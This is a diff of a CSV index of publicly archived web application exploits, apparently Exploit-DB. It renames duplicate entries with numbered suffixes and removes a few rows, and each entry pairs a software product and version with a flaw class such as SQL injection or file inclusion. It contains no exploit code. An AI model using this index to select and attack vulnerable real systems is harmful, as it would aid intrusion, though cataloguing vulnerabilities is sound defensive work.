5456,platforms/asp/webapps/5456.txt,"Carbon Communities 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0
5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - 'id' Parameter SQL Injection",2008-04-16,cO2,php,webapps,0
5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion",2008-04-17,by_casper41,php,webapps,0
@ -18957,7 +18959,7 @@ id,file,description,date,author,platform,type,port
5499,platforms/php/webapps/5499.txt,"Siteman 2.x - Code Execution / Local File Inclusion / Cross-Site Scripting",2008-04-26,"Khashayar Fereidani",php,webapps,0
5500,platforms/php/webapps/5500.txt,"PostNuke Module pnFlashGames 2.5 - SQL Injection",2008-04-26,Kacper,php,webapps,0
5501,platforms/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 - Remote File Inclusion",2008-04-26,RoMaNcYxHaCkEr,php,webapps,0
5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 - 'postview.php' SQL Injection (1)",2008-04-26,U238,php,webapps,0
5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 - 'postview.php' SQL Injection",2008-04-26,U238,php,webapps,0
5503,platforms/asp/webapps/5503.txt,"Angelo-Emlak 1.0 - Multiple SQL Injections",2008-04-26,U238,asp,webapps,0
5504,platforms/php/webapps/5504.txt,"PHP Forge 3 Beta 2 - 'id' Parameter SQL Injection",2008-04-26,JIKO,php,webapps,0
5505,platforms/php/webapps/5505.txt,"RunCMS Module MyArticles 0.6 Beta-1 - SQL Injection",2008-04-26,Cr@zy_King,php,webapps,0
@ -19275,7 +19277,7 @@ id,file,description,date,author,platform,type,port
5876,platforms/php/webapps/5876.txt,"Jamroom 3.3.5 - Remote File Inclusion",2008-06-20,cyberlog,php,webapps,0
5877,platforms/php/webapps/5877.txt,"jaxultrabb 2.0 - Local File Inclusion / Cross-Site Scripting",2008-06-20,"CWH Underground",php,webapps,0
5878,platforms/php/webapps/5878.txt,"emuCMS 0.3 - 'cat_id' Parameter SQL Injection",2008-06-20,TurkishWarriorr,php,webapps,0
5879,platforms/php/webapps/5879.txt,"phpAuction - 'profile.php' SQL Injection",2008-06-20,Mr.SQL,php,webapps,0
5879,platforms/php/webapps/5879.txt,"phpAuction - 'profile.php' SQL Injection (1)",2008-06-20,Mr.SQL,php,webapps,0
5880,platforms/php/webapps/5880.txt,"SiteXS CMS 0.1.1 - Arbitrary File Upload / Cross-Site Scripting",2008-06-21,"CWH Underground",php,webapps,0
5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 - SQL Injection",2008-06-21,Mr.SQL,php,webapps,0
5882,platforms/php/webapps/5882.txt,"eNews 0.1 - 'delete.php' Arbitrary Delete Post",2008-06-21,"ilker Kandemir",php,webapps,0
@ -19461,7 +19463,7 @@ id,file,description,date,author,platform,type,port
6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - 'UID' Parameter SQL Injection",2008-07-17,"Hussin X",php,webapps,0
6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0
6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
6097,platforms/php/webapps/6097.txt,"Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection",2008-07-17,QTRinux,php,webapps,0
6097,platforms/php/webapps/6097.txt,"Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection (1)",2008-07-17,QTRinux,php,webapps,0
6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0
6099,platforms/php/webapps/6099.txt,"Siteframe CMS 3.2.3 - 'folder.php' SQL Injection",2008-07-18,n0ne,php,webapps,0
6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - SQL Injection",2008-07-20,Mr.SQL,php,webapps,0
@ -19473,7 +19475,7 @@ id,file,description,date,author,platform,type,port
6110,platforms/cgi/webapps/6110.pl,"MojoJobs - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0
6111,platforms/cgi/webapps/6111.pl,"MojoAuto - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0
6112,platforms/php/webapps/6112.txt,"EZWebAlbum - Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps,0
6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection",2008-07-21,ldma,php,webapps,0
6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection (2)",2008-07-21,ldma,php,webapps,0
6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' Parameter SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0
6115,platforms/php/webapps/6115.txt,"EZWebAlbum - Insecure Cookie Handling",2008-07-21,"Virangar Security",php,webapps,0
6117,platforms/php/webapps/6117.txt,"YouTube blog 0.1 - Remote File Inclusion / SQL Injection / Cross-Site Scripting",2008-07-22,Unohope,php,webapps,0
@ -19593,7 +19595,7 @@ id,file,description,date,author,platform,type,port
6294,platforms/php/webapps/6294.txt,"5 star review - Cross-Site Scripting / SQL Injection",2008-08-24,Mr.SQL,php,webapps,0
6295,platforms/php/webapps/6295.txt,"MiaCMS 4.6.5 - Multiple SQL Injections",2008-08-24,~!Dok_tOR!~,php,webapps,0
6296,platforms/php/webapps/6296.txt,"BtiTracker 1.4.7 / xbtit 2.0.542 - SQL Injection",2008-08-25,InATeam,php,webapps,0
6297,platforms/php/webapps/6297.txt,"Matterdaddy Market 1.1 - Multiple SQL Injections (1)",2008-08-25,~!Dok_tOR!~,php,webapps,0
6297,platforms/php/webapps/6297.txt,"Matterdaddy Market 1.1 - 'index.php' Multiple SQL Injections",2008-08-25,~!Dok_tOR!~,php,webapps,0
6298,platforms/php/webapps/6298.txt,"Web Directory Script 2.0 - 'name' Parameter SQL Injection",2008-08-25,~!Dok_tOR!~,php,webapps,0
6300,platforms/php/webapps/6300.txt,"Pluck CMS 4.5.2 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0
6301,platforms/php/webapps/6301.txt,"EZContents CMS 2.0.3 - Multiple Local File Inclusion",2008-08-25,DSecRG,php,webapps,0
@ -19686,11 +19688,11 @@ id,file,description,date,author,platform,type,port
6432,platforms/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution",2008-09-11,"Khashayar Fereidani",php,webapps,0
6433,platforms/php/webapps/6433.txt,"Autodealers CMS AutOnline - 'id' Parameter SQL Injection",2008-09-11,ZoRLu,php,webapps,0
6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - 'id' Parameter SQL Injection",2008-09-11,"Virangar Security",php,webapps,0
6436,platforms/php/webapps/6436.txt,"PHPWebGallery 1.3.4 - Blind SQL Injection",2008-09-11,Stack,php,webapps,0
6436,platforms/php/webapps/6436.txt,"PHPWebGallery 1.3.4 - Blind SQL Injection (1)",2008-09-11,Stack,php,webapps,0
6437,platforms/php/webapps/6437.txt,"Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user",2008-09-11,Stack,php,webapps,0
6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 - 'cookie' Authentication Bypass",2008-09-11,Tec-n0x,php,webapps,0
6439,platforms/php/webapps/6439.txt,"Sports Clubs Web Panel 0.0.1 - Arbitrary File Upload",2008-09-12,Stack,php,webapps,0
6440,platforms/php/webapps/6440.pl,"PHPWebGallery 1.3.4 - Blind SQL Injection",2008-09-12,ka0x,php,webapps,0
6440,platforms/php/webapps/6440.pl,"PHPWebGallery 1.3.4 - Blind SQL Injection (2)",2008-09-12,ka0x,php,webapps,0
6442,platforms/php/webapps/6442.txt,"pForum 1.30 - 'showprofil.php' SQL Injection",2008-09-12,tmh,php,webapps,0
6443,platforms/php/webapps/6443.pl,"WebPortal CMS 0.7.4 - 'download.php' SQL Injection",2008-09-12,StAkeR,php,webapps,0
6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 - 'cat' Parameter SQL Injection",2008-09-12,r45c4l,php,webapps,0
@ -20186,7 +20188,7 @@ id,file,description,date,author,platform,type,port
7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0
7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0
7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion",2008-11-08,dun,php,webapps,0
7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass (1)",2008-11-08,G4N0K,php,webapps,0
7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - Authentication Bypass",2008-11-08,d3b4g,asp,webapps,0
7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script - Authentication Bypass",2008-11-08,Cyber-Zone,php,webapps,0
7069,platforms/php/webapps/7069.txt,"V3 Chat Live Support 3.0.4 - Insecure Cookie Handling",2008-11-08,Cyber-Zone,php,webapps,0
@ -21877,7 +21879,7 @@ id,file,description,date,author,platform,type,port
9839,platforms/php/webapps/9839.txt,"Achievo 1.3.4 - Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0
9840,platforms/php/webapps/9840.txt,"Joomla! Component GroupJive 1.8 B4 - Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0
9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0
9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (1)",2009-11-04,Abysssec,php,webapps,0
9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0
9850,platforms/php/webapps/9850.txt,"Xerox Fiery Webtools - SQL Injection",2009-11-03,"Bernardo Trigo",php,webapps,0
9854,platforms/php/webapps/9854.txt,"TFTgallery .13 - Directory Traversal",2009-11-02,blake,php,webapps,0
@ -22297,7 +22299,7 @@ id,file,description,date,author,platform,type,port
10712,platforms/php/webapps/10712.txt,"Nuked-klaN SP4 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0
10713,platforms/asp/webapps/10713.txt,"Esinti Web Design Gold Defter - Database Disclosure",2009-12-26,LionTurk,asp,webapps,0
10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 - 'event.php id' SQL Injection",2009-12-26,The_HuliGun,php,webapps,0
10717,platforms/php/webapps/10717.txt,"DBHcms 1.1.4 - Remote File Inclusion",2009-12-26,Gamoscu,php,webapps,0
10717,platforms/php/webapps/10717.txt,"DBHcms 1.1.4 - 'dbhcms_core_dir' Remote File Inclusion",2009-12-26,Gamoscu,php,webapps,0
10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script (Arabic Version) - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0
10719,platforms/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0
10720,platforms/php/webapps/10720.txt,"PHP Football 1.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0
@ -22996,7 +22998,6 @@ id,file,description,date,author,platform,type,port
11948,platforms/php/webapps/11948.txt,"Denapars Shop Script - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0
11949,platforms/php/webapps/11949.txt,"Fa-Ads - Authentication Bypass",2010-03-30,indoushka,php,webapps,0
11950,platforms/php/webapps/11950.txt,"Fa Home - Authentication Bypass",2010-03-30,indoushka,php,webapps,0
11951,platforms/php/webapps/11951.txt,"E-book Store - Multiple Vulnerabilities (1)",2010-03-30,indoushka,php,webapps,0
11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software - Multiple Vulnerabilities",2010-03-30,EL-KAHINA,php,webapps,0
11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Inclusion",2010-03-30,mat,php,webapps,0
11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - Authentication Bypass",2010-03-30,indoushka,php,webapps,0
@ -23090,7 +23091,7 @@ id,file,description,date,author,platform,type,port
12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusion",2010-04-07,eidelweiss,php,webapps,0
12108,platforms/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0
12111,platforms/php/webapps/12111.txt,"Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (1)",2010-04-08,AntiSecurity,php,webapps,0
12113,platforms/php/webapps/12113.txt,"Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0
12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
@ -23573,7 +23574,7 @@ id,file,description,date,author,platform,type,port
12850,platforms/php/webapps/12850.txt,"Member ID The Fish Index PHP - SQL Injection",2010-06-03,v4lc0m87,php,webapps,0
12855,platforms/php/webapps/12855.txt,"phpBazar 2.1.1 stable - Remote File Inclusion",2010-06-03,Sid3^effects,php,webapps,0
12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 - Arbitrary File Upload",2010-06-03,indoushka,php,webapps,0
12857,platforms/php/webapps/12857.txt,"E-book Store - Multiple Vulnerabilities (2)",2010-06-03,indoushka,php,webapps,0
12857,platforms/php/webapps/12857.txt,"E-book Store - Multiple Vulnerabilities",2010-06-03,indoushka,php,webapps,0
12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 - Reinstall",2010-06-03,indoushka,php,webapps,0
12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites - (File Disclosure) Vulnerabilities",2010-06-03,indoushka,php,webapps,0
12861,platforms/php/webapps/12861.txt,"PHP SETI@home Web monitor - (PHPsetimon) Remote File Inclusion / Local File Inclusion",2010-06-03,eidelweiss,php,webapps,0
@ -23739,7 +23740,7 @@ id,file,description,date,author,platform,type,port
13967,platforms/php/webapps/13967.txt,"Online Classified System Script - SQL Injection / Cross-Site Scripting",2010-06-22,"L0rd CrusAd3r",php,webapps,0
13969,platforms/php/webapps/13969.txt,"Job Search Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
13970,platforms/php/webapps/13970.txt,"Video Community portal - SQL Injection / Cross-Site Scripting",2010-06-22,"L0rd CrusAd3r",php,webapps,0
13971,platforms/php/webapps/13971.txt,"Classifieds Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
13971,platforms/php/webapps/13971.txt,"Classifieds Script - 'rate' SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
13973,platforms/php/webapps/13973.txt,"Hot or Not Picture Rating Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
13975,platforms/php/webapps/13975.txt,"Webring Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
13976,platforms/php/webapps/13976.txt,"Top Sites Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0
@ -23772,7 +23773,7 @@ id,file,description,date,author,platform,type,port
14011,platforms/php/webapps/14011.txt,"OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities",2010-06-24,"David Shaw",php,webapps,0
14015,platforms/php/webapps/14015.txt,"2DayBiz Photo Sharing Script - SQL Injection (1)",2010-06-24,JaMbA,php,webapps,0
14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - 'init.php' Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0
14017,platforms/php/webapps/14017.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion",2010-06-24,MISTERFRIBO,php,webapps,0
14017,platforms/php/webapps/14017.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (2)",2010-06-24,MISTERFRIBO,php,webapps,0
14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
14020,platforms/php/webapps/14020.txt,"2DayBiz The Web Template Software - SQL Injection / Cross-Site Scripting",2010-06-24,Sangteamtham,php,webapps,0
@ -24318,7 +24319,7 @@ id,file,description,date,author,platform,type,port
15300,platforms/php/webapps/15300.txt,"Squirrelcart PRO 3.0.0 - Blind SQL Injection",2010-10-21,"Salvatore Fresta",php,webapps,0
15295,platforms/php/webapps/15295.html,"sNews CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"High-Tech Bridge SA",php,webapps,0
15308,platforms/php/webapps/15308.txt,"Pulse Pro 1.4.3 - Persistent Cross-Site Scripting",2010-10-24,"Th3 RDX",php,webapps,0
15309,platforms/php/webapps/15309.txt,"DBHcms 1.1.4 - SQL Injection",2010-10-24,ZonTa,php,webapps,0
15309,platforms/php/webapps/15309.txt,"DBHcms 1.1.4 - 'dbhcms_pid' SQL Injection",2010-10-24,ZonTa,php,webapps,0
15310,platforms/php/webapps/15310.py,"Jamb - Cross-Site Request Forgery (Add a Post)",2010-10-25,Stoke,php,webapps,0
15313,platforms/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor - Multiple Vulnerabilities",2010-10-25,"David Hoyt",php,webapps,0
15320,platforms/php/webapps/15320.py,"BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)",2010-10-26,Sweet,php,webapps,0
@ -25092,7 +25093,6 @@ id,file,description,date,author,platform,type,port
17633,platforms/php/webapps/17633.txt,"Cart Software - Multiple Vulnerabilities",2011-08-06,hosinn,php,webapps,0
17639,platforms/php/webapps/17639.txt,"XpressEngine 1.4.5.7 - Persistent Cross-Site Scripting",2011-08-08,v0nSch3lling,php,webapps,0
17640,platforms/php/webapps/17640.txt,"BlogPHP 2.0 - Persistent Cross-Site Scripting",2011-08-09,Paulzz,php,webapps,0
17641,platforms/php/webapps/17641.txt,"LaserNet CMS 1.5 - SQL Injection (1)",2011-08-09,p0pc0rn,php,webapps,0
17644,platforms/php/webapps/17644.txt,"FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (2)",2011-08-09,pentesters.ir,php,webapps,0
17646,platforms/php/webapps/17646.txt,"Joomla! Component Search 3.0.0 - SQL Injection",2011-08-09,NoGe,php,webapps,0
17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 - DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0
@ -26917,7 +26917,7 @@ id,file,description,date,author,platform,type,port
23886,platforms/windows/webapps/23886.txt,"simple WebServer 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0
23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0
23890,platforms/cgi/webapps/23890.txt,"Fresh Guest Book 1.0/2.x - HTML Injection",2004-03-29,"koi8-r Shelz",cgi,webapps,0
23891,platforms/asp/webapps/23891.txt,"Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection",2004-03-29,"Manuel Lopez",asp,webapps,0
23891,platforms/asp/webapps/23891.txt,"Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection (2)",2004-03-29,"Manuel Lopez",asp,webapps,0
23894,platforms/cgi/webapps/23894.txt,"Cloisterblog 1.2.2 - Journal.pl Directory Traversal",2004-03-29,Dotho,cgi,webapps,0
23895,platforms/asp/webapps/23895.txt,"Interchange 4.8.x/5.0 - Remote Information Disclosure",2004-03-30,anonymous,asp,webapps,0
23897,platforms/cgi/webapps/23897.txt,"LinBit Technologies LINBOX Officeserver - Remote Authentication Bypass",2004-03-30,"Martin Eiszner",cgi,webapps,0
@ -30329,7 +30329,6 @@ id,file,description,date,author,platform,type,port
28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 - popup.php SQL Injection",2006-11-04,x23,php,webapps,0
28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 - Install.php3 Remote File Inclusion",2006-11-06,Mahmood_ali,php,webapps,0
28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 - NewList.php Cross-Site Scripting",2006-11-06,CvIr.System,php,webapps,0
28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection (2)",2006-11-06,Liz0ziM,php,webapps,0
28917,platforms/php/webapps/28917.txt,"AIOCP 1.3.x - 'cp_forum_view.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0
28918,platforms/php/webapps/28918.txt,"AIOCP 1.3.x - 'cp_dpage.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0
28919,platforms/php/webapps/28919.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0
@ -30473,7 +30472,7 @@ id,file,description,date,author,platform,type,port
29079,platforms/php/webapps/29079.txt,"vBulletin 3.6.x - Admin Control Panel index.php Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps,0
29080,platforms/asp/webapps/29080.txt,"BestWebApp Dating Site Login Component - Multiple Field SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0
29081,platforms/asp/webapps/29081.txt,"BestWebApp Dating Site - login_form.asp msg Parameter Cross-Site Scripting",2006-11-17,"laurent gaffie",asp,webapps,0
29085,platforms/asp/webapps/29085.txt,"Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0
29085,platforms/asp/webapps/29085.txt,"Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection (1)",2006-11-18,"laurent gaffie",asp,webapps,0
29084,platforms/asp/webapps/29084.txt,"A-Cart Pro 2.0 - product.asp ProductID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0
29087,platforms/asp/webapps/29087.txt,"ActiveNews Manager - 'page' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0
29088,platforms/asp/webapps/29088.txt,"ActiveNews Manager - 'query' Parameter Cross-Site Scripting",2006-11-18,"laurent gaffie",asp,webapps,0
@ -31358,7 +31357,7 @@ id,file,description,date,author,platform,type,port
30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - My_Statistics.php Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0
30487,platforms/php/webapps/30487.txt,"PHP-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0
30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 - 'index.php' Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps,0
30489,platforms/php/webapps/30489.txt,"Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0
30489,platforms/php/webapps/30489.txt,"Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0
30492,platforms/php/webapps/30492.txt,"SkilMatch Systems JobLister3 - 'index.php' SQL Injection",2007-07-13,joseph.giron13,php,webapps,0
30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Inclusion",2007-07-09,Crackers_Child,php,webapps,0
30504,platforms/php/webapps/30504.txt,"Olate Download 3.4.1 - admin.php Remote Authentication Bypass",2007-07-16,imei,php,webapps,0
@ -31665,9 +31664,9 @@ id,file,description,date,author,platform,type,port
30961,platforms/php/webapps/30961.txt,"MatPo.de Kontakt Formular 1.4 - 'function.php' Remote File Inclusion",2007-12-30,bd0rk,php,webapps,0
30962,platforms/php/webapps/30962.txt,"MilliScripts - 'dir.php' Cross-Site Scripting",2007-12-31,"Jose Luis Gangora Fernandez",php,webapps,0
30963,platforms/asp/webapps/30963.txt,"InstantSoftwares Dating Site - Login SQL Injection",2007-12-31,"Aria-Security Team",asp,webapps,0
30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0
30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting (1)",2007-12-31,Doz,php,webapps,0
30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 - 'q' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0
30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0
30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting (2)",2007-12-31,Doz,php,webapps,0
30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 - 'email' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0
30979,platforms/php/webapps/30979.txt,"WordPress 2.2.3 - 'wp-admin/edit.php' backup Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0
30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0
@ -31713,8 +31712,8 @@ id,file,description,date,author,platform,type,port
31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,AmnPardaz,asp,webapps,0
31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
31061,platforms/php/webapps/31061.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31062,platforms/php/webapps/31062.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31061,platforms/php/webapps/31061.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting (1)",2008-01-25,"Omer Singer",php,webapps,0
31062,platforms/php/webapps/31062.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting (2)",2008-01-25,"Omer Singer",php,webapps,0
31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 - 'pref.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 - 'search.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 - 'report_type' Cross-Site Scripting",2008-01-26,nnposter,php,webapps,0
@ -32040,7 +32039,6 @@ id,file,description,date,author,platform,type,port
31521,platforms/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection",2014-02-07,"High-Tech Bridge SA",php,webapps,80
31525,platforms/php/webapps/31525.txt,"MyBB Extended Useradmininfo Plugin 1.2.1 - Cross-Site Scripting",2014-02-09,"Fikri Fadzil",php,webapps,80
31527,platforms/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hard-Coded Credentials",2014-02-09,"Cesar Neira",hardware,webapps,80
31532,platforms/php/webapps/31532.txt,"Clever Copy 3.0 - 'postview.php' SQL Injection (2)",2008-03-25,U238,php,webapps,0
31535,platforms/php/webapps/31535.txt,"phpBB PJIRC Module 0.5 - 'irc.php' Local File Inclusion",2008-03-25,0in,php,webapps,0
31537,platforms/cgi/webapps/31537.txt,"BlackBoard Academic Suite 6/7 - webapps/BlackBoard/execute/viewCatalog searchText Parameter Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0
31538,platforms/cgi/webapps/31538.txt,"BlackBoard Academic Suite 6/7 - bin/common/announcement.pl data__announcements___pk1_pk2__subject Parameter Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0
@ -32304,7 +32302,7 @@ id,file,description,date,author,platform,type,port
31939,platforms/php/webapps/31939.txt,"vBulletin 3.7.1 - Moderation Control Panel 'redirect' Parameter Cross-Site Scripting",2008-06-19,"Jessica Hope",php,webapps,0
31943,platforms/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting / Arbitrary File Upload",2008-06-20,AmnPardaz,php,webapps,0
32214,platforms/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,php,webapps,80
31944,platforms/php/webapps/31944.txt,"phpAuction - 'profile.php' SQL Injection",2008-06-21,Mr.SQL,php,webapps,0
